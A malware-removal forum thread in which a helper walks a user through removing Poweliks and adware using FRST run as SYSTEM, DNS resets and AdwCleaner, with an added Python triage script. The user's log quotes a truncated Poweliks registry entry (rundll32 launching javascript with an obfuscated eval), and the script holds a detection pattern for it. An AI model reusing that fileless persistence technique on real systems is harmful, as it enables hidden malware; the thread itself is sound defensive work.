Quads
Malware Removalists
In New Zealand
Posts: 9,387
Post by Quads on Oct 22, 2014 15:11:34 GMT -8
I think I have worked out the reason for the error message now, which is fine. FRST may have taken just the smallest part of Poweliks, like taking a piece out of a jigsaw puzzle, and now it is seen as invalid, like an incomplete jigsaw puzzle if you like.
Let's try this step by step.
Download the attached "Runassystem" program and have it on the infected system's Desktop, AND download the same fixlist.txt as is already on this thread in previous instructions.
Now, with FRST64, Runassystem and fixlist all ready on the Desktop of the infected system:
Start Runassystem. When it loads, click the Browse button, find FRST64 and select it. Now in Runassystem's type box you will have
C:\users\[USER ACCOUNT]\Desktop\FRST64.exe
Click the OK button and Runassystem will start FRST64, but it has started the program using the SYSTEM account (not a standard account or admin account).
You can bring FRST64 to the front if Runassystem is over the top.
Then click the Fix button in FRST64. Now FRST should run the script like last time, BUT this time FRST is using SYSTEM account rights to try and get the registry keys; some of the items for files will not be found this time.
Quads
Post by cobra67 on Oct 22, 2014 16:16:06 GMT -8
Please find below the output of the fixlog.txt file:
Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 22-10-2014
Ran by SYSTEM at 2014-10-22 19:12:26 Run:2
Running from C:\Users\Nancy\Desktop
Loaded Profile: Nancy (Available profiles: Nancy)
Boot Mode: Normal
==============================================

Content of fixlist:
*****************
start
HKLM-x32\...\Run: [] => [X]
HKU\S-1-5-21-2134480210-3544642227-3402910462-1000\...\Run: [AdobeBridge] => [X]
HKU\S-1-5-21-2134480210-3544642227-3402910462-1000\...\MountPoints2: {a17a1810-f75a-11e1-8e21-386077ec3306} - F:\iLinker.exe
HKU\S-1-5-21-2134480210-3544642227-3402910462-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
AppInit_DLLs: C:\PROGRA~2\SearchProtect\SearchProtect\bin\SPVC64Loader.dll => C:\PROGRA~2\SearchProtect\SearchProtect\bin\SPVC64Loader.dll File Not Found
C:\PROGRA~2\SearchProtect\SearchProtect\bin\SPVC64Loader.dll
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
Winsock: Catalog9-x64 01 C:\Windows\system32\AdpeakProxy64.dll [439296] (Adpeak, Inc.)
Winsock: Catalog9-x64 02 C:\Windows\system32\AdpeakProxy64.dll [439296] (Adpeak, Inc.)
Winsock: Catalog9-x64 03 C:\Windows\system32\AdpeakProxy64.dll [439296] (Adpeak, Inc.)
Winsock: Catalog9-x64 04 C:\Windows\system32\AdpeakProxy64.dll [439296] (Adpeak, Inc.)
Winsock: Catalog9-x64 15 C:\Windows\system32\AdpeakProxy64.dll [439296] (Adpeak, Inc.)
S2 AdpeakProxy; No ImagePath
S4 CltMngSvc; C:\PROGRA~2\SearchProtect\Main\bin\CltMngSvc.exe [X]
C:\PROGRA~2\SearchProtect\Main\bin\CltMngSvc.exe
CustomCLSID: HKU\S-1-5-21-2134480210-3544642227-3402910462-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
AlternateDataStreams: C:\ProgramData\Temp:D287FACF
AlternateDataStreams: C:\ProgramData\Temp:D3A96964
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AdpeakProxy => ""="service"
end
*****************

HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ => Value not found.
HKU\S-1-5-21-2134480210-3544642227-3402910462-1000\Software\Microsoft\Windows\CurrentVersion\Run\\AdobeBridge => Value not found.
"HKU\S-1-5-21-2134480210-3544642227-3402910462-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{a17a1810-f75a-11e1-8e21-386077ec3306}" => Key not found.
"HKCR\CLSID\{a17a1810-f75a-11e1-8e21-386077ec3306}" => Key not found.
"HKU\S-1-5-21-2134480210-3544642227-3402910462-1000\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32" => Key Deleted Successfully.
"HKU\S-1-5-21-2134480210-3544642227-3402910462-1000\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key deleted successfully.
"C:\PROGRA~2\SearchProtect\SearchProtect\bin\SPVC64Loader.dll" => Value Data not found.
"C:\PROGRA~2\SearchProtect\SearchProtect\bin\SPVC64Loader.dll" => File/Directory not found.
"HKLM\SOFTWARE\Policies\Google" => Key not found.
Winsock: Catalog entry 000000000001 => Deleted successfully.
Winsock: Catalog entry 000000000002 => Deleted successfully.
Winsock: Catalog entry 000000000003 => Deleted successfully.
Winsock: Catalog entry 000000000004 => Deleted successfully.
Winsock: Catalog entry 000000000015 => Not found.
AdpeakProxy => Service not found.
CltMngSvc => Service not found.
"C:\PROGRA~2\SearchProtect\Main\bin\CltMngSvc.exe" => File/Directory not found.
"HKU\S-1-5-21-2134480210-3544642227-3402910462-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key not found.
"C:\ProgramData\Temp" => ":D287FACF" ADS not found.
C:\ProgramData\Temp => ":D3A96964" ADS removed successfully.
"HKLM\System\CurrentControlSet\Control\SafeBoot\Network\AdpeakProxy" => Key not found.
==== End of Fixlog ====
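The entry FRST tagged as Poweliks in the log above is a per-user COM CLSID whose LocalServer32 value runs rundll32.exe with a javascript: URL and an eval() of a scrambled string, rather than naming an executable. The script below is an added triage example, not part of this thread or of FRST: it scans FRST-style CustomCLSID lines for that pattern and undoes the scrambling, which on the fragment quoted in the log is a shift of every character by one code point (e -> d, / -> .). The sample log is constructed from the line above plus a made-up benign entry; nothing is claimed about the 247 characters the log does not show.

```python
import re
from typing import Dict, List

# Constructed sample: the first line is modelled on the CustomCLSID line in the
# FRST log above; the second is a made-up benign entry for contrast.
SAMPLE_LOG = r'''
CustomCLSID: HKU\S-1-5-21-2134480210-3544642227-3402910462-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters).
CustomCLSID: HKU\S-1-5-21-2134480210-3544642227-3402910462-1000_Classes\CLSID\{11111111-2222-3333-4444-555555555555}\localserver32 -> C:\Program Files\ExampleApp\server.exe
'''

# A LocalServer32 value should name an executable. rundll32 handed a javascript:
# URL that reaches mshtml's RunHTMLApplication is the shape FRST flagged above.
SUSPICIOUS = re.compile(r'rundll32(?:\.exe)?\s+javascript:|mshtml,RunHTMLApplication', re.I)
ENTRY = re.compile(r'^[^:]+:\s*(?P<key>\S+?\\localserver32)\s*->\s*(?P<cmd>.*)$', re.I | re.M)
EVAL_ARG = re.compile(r'eval\("([^"\s]+)')


def decode_shift1(text: str) -> str:
    """Undo the shift-by-one substitution seen in the log fragment: every
    character is replaced by the one whose code point is one lower."""
    return ''.join(chr(ord(c) - 1) for c in text)


def find_poweliks_entries(log_text: str) -> List[Dict[str, str]]:
    """Return each LocalServer32 entry whose command matches SUSPICIOUS,
    with the eval() argument decoded when one is present in the line."""
    hits = []
    for m in ENTRY.finditer(log_text):
        cmd = m.group('cmd')
        if not SUSPICIOUS.search(cmd):
            continue
        arg = EVAL_ARG.search(cmd)
        hits.append({
            'key': m.group('key'),
            'command': cmd,
            'decoded': decode_shift1(arg.group(1)) if arg else '',
        })
    return hits


if __name__ == '__main__':
    for hit in find_poweliks_entries(SAMPLE_LOG):
        print(hit['key'])
        print('  decoded eval() argument:', hit['decoded'])
```

The decoded prefix reads as the start of a document.write() of a script tag, which is why FRST's "<==== Poweliks" marker on this key deserves the attention it got in the thread.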
Post by Quads on Oct 22, 2014 16:20:37 GMT -8
We still have the DNS setting and other PUP items to deal with, BUT
the last step was just to take items and break the malware apart; some go into quarantine. Poweliks has been broken!!!
Now though in Normal Mode the system should be running a lot better and dllhost.exe should quieten down.
Quads
Post by cobra67 on Oct 22, 2014 16:25:27 GMT -8
Yay! It sure IS running better!! Thank you so much!!!
Post by Quads on Oct 22, 2014 16:34:54 GMT -8
I have to find the instructions I have used once before for a system that had similar DNS settings but a different cause and IP address.
Quads
Post by Quads on Oct 22, 2014 18:36:58 GMT -8
Windows 7 or Vista
a) Go to Control Panel.
b) Open up Network and Internet (view by category) and Network and Sharing Center (view by small or large icons).
c) Click on Local Area Connection.
d) Click the Properties button.
e) Select "Internet Protocol Version 4 (TCP/IPv4)" and click the Properties button.
f) In the properties window you will see a few radio boxes. Select "Obtain an IP address automatically" and "Obtain DNS server address automatically" and click OK to use your ISP as your default DNS. (You may want to make sure the Preferred DNS server and Alternate DNS server boxes are empty first, before you click Obtain DNS server address automatically.)
The change may not take effect until you next connect to the Internet / start Windows.
Quads
Post by cobra67 on Oct 22, 2014 19:13:08 GMT -8
I've made the changes as requested and have rebooted my PC.
Post by Quads on Oct 22, 2014 19:21:29 GMT -8
Now we will go looking for the rest of the PUP items before having FRST look at the DNS and Winsock items. Read carefully.
Download AdwCleaner (www.bleepingcomputer.com/download/adwcleaner/) on to your desktop using the blue "Download Now @ Bleeping Computer" button, and run a scan (Scan button). It will create a log afterwards, or there is a Report button. ONE SCAN ONLY.
Attach or paste the log back here.
Quads
Post by cobra67 on Oct 22, 2014 19:50:18 GMT -8
I've downloaded and run the program...it is now saying "Pending. Please uncheck elements you don't want to remove". Please advise what to do next. Thank you.
Post by cobra67 on Oct 22, 2014 19:52:38 GMT -8
I just realized there is a "Report" button. I'll go ahead and select it. Thanks.